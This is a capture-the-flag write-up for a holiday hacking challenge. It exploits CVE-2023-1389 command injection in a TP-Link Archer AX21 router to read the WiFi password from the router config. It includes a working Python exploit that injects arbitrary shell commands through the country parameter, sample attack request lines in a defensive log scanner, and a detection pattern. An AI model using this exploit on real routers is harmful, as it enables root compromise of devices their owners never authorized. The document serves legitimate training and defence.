Dosis Network Down⚓︎

Difficulty:
Direct link: Dosis Network Down
Area: 24-7
In-game avatar: Janusz Jasinski

Hints⚓︎

Version

I can't believe nobody created a backup account on our main router...the only thing I can think of is to check the version number of the router to see if there are any...ways around it...

UCI

You know...if my memory serves me correctly...there was a lot of fuss going on about a UCI (I forgot the exact term...) for that router.

Objective⚓︎

Request

Drop by JJ's 24-7 for a network rescue and help restore the holiday cheer.
What is the WiFi password found in the router's config?

Janusz Jasinski

Alright then. Those bloody gnomes 'ave proper messed about with the neighborhood's wifi - changed the admin password, probably mucked up all the settings, the lot.
Now I can't get online and it's doing me 'ead in, innit?
We own this router, so we're just takin' back what's ours, yeah?
You reckon you can 'elp me 'ack past whatever chaos these little blighters left be'ind?

High-Level Steps⚓︎

  1. Identify – Identify the router version and applicable vulnerabilities.
  2. Exploit – Execute commands via the command-injection vulnerability.
  3. Extract – Retrieve the WiFi credentials from the router configuration.

```mermaid
flowchart TD

  subgraph Row1["Identify"]
    direction LR
    A[Check router model and firmware]
    B[Research known vulnerabilities]
    C[Found CVE-2023-1389]
    A --> B --> C
  end

  subgraph Row2["Exploit"]
    direction LR
    D[Craft malicious request]
    E[Execute arbitrary command]
    D --> E
  end

  subgraph Row3["Extract"]
    direction LR
    F[Read wireless config file]
    G[Recover WiFi password]
    H[Objective completed]
    F --> G --> H
  end

  Row1 --> Row2
  Row2 --> Row3
```

Solution⚓︎

The challenge website notes the router firmware version and the hardware version at the bottom.

https://dosis-network-down.holidayhackchallenge.com/ 

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface.
Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
Ref: nvd.nist.gov
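An added defensive example, not code from this writeup or from the Voyag3r-Security repository: it scans constructed access-log lines from the router's web interface for write requests to the locale form whose country value carries shell metacharacters, which is the request shape this vulnerability is exploited through. The log format, the sample lines and the metacharacter list are assumptions; the path check accepts both the /luci;stok= and /luci/;stok= spellings.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines in common log format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Dec/2025:10:00:01 +0000] "GET /cgi-bin/luci/;stok=/locale?form=lang&operation=read HTTP/1.1" 200 512
192.0.2.10 - - [24/Dec/2025:10:00:02 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US HTTP/1.1" 200 64
198.51.100.7 - - [24/Dec/2025:10:00:03 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cat%20/etc/config/wireless) HTTP/1.1" 200 1730
198.51.100.7 - - [24/Dec/2025:10:00:04 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28id%29 HTTP/1.1" 200 64
203.0.113.5 - - [24/Dec/2025:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumed indicator set: a real country code is two letters, so any shell
# metacharacter in the value is suspicious. Tune for your environment.
SHELL_META = re.compile(r'\$\(|\$\{|`|[;|&]')
# The stok session token may be empty (as in the unauthenticated request).
LOCALE_PATH = re.compile(r"/cgi-bin/luci/?;stok=[^/]*/locale")


def inspect_request(target):
    """Return the decoded country value when `target` is a write to the
    locale form carrying shell metacharacters, otherwise None."""
    parts = urlsplit(target)
    if LOCALE_PATH.fullmatch(unquote(parts.path)) is None:
        return None
    # parse_qs percent-decodes values, so %24%28 is seen as $( as well.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if qs.get("form") != ["country"] or qs.get("operation") != ["write"]:
        return None
    for value in qs.get("country", []):
        if SHELL_META.search(value):
            return value
    return None


def scan_log(text):
    """Return a list of (source IP, method, decoded country value) per suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        value = inspect_request(m["target"])
        if value is not None:
            hits.append((m["src"], m["method"], value))
    return hits
```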

The GitHub Voyag3r-Security/CVE-2023-1389 repository notes that its reverse shell was tested on firmware 2.1.5 Build 20211231 rel.73898(5553), Hardware Version Archer AX21 v2.0.
The script archer-file-transfer.py in that repo leverages a reverse shell.
We modify that script so that it takes an arbitrary command to execute.

CVE-2023-1389

```python
import requests, urllib.parse, argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress warning for connecting to a router with a self-signed certificate
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest="router", default="192.168.0.1", help="Router name")
parser.add_argument("-p", "--payload", dest="payload", default="ls", help="attack payload")

args = parser.parse_args()

# Ashish Gupta - Take an arbitrary command in the -payload switch to execute
payload = args.payload
# The unsanitized country parameter reaches popen(), so the $(...) is expanded by the shell
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + payload + ")"

# Send the URL twice to run the command. Sending twice is necessary for the attack
r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)
print(f'Command to execute :{payload}')
print("########## ---Output--- ########")
print(r.text)
```

Sending the `ls` command to list the files in the current directory:

```shell
python archer-rev-shell.py -r dosis-network-down.holidayhackchallenge.com -p 'ls'
```

Sending `cat /etc/config/wireless` to read the wireless configuration:

```shell
python archer-rev-shell.py -r dosis-network-down.holidayhackchallenge.com -p 'cat /etc/config/wireless'
```

The config shows the WiFi password as SprinklesAndPackets2025!

The answer is accepted.

Answer

SprinklesAndPackets2025!

Response⚓︎

Janusz Jasinski

Brilliant work, that. Got me connection back and sent those gnomes packin' from the router.
Now I can finally get back to streamin' some proper metal. BTC tips accepted, by the way.

Learnings⚓︎

Once I know the firmware version of a router, I can search for published vulnerabilities affecting that firmware, look for available exploits, and use them against the router.

Prevention & Hardening Notes⚓︎

Keep router and network device firmware up to date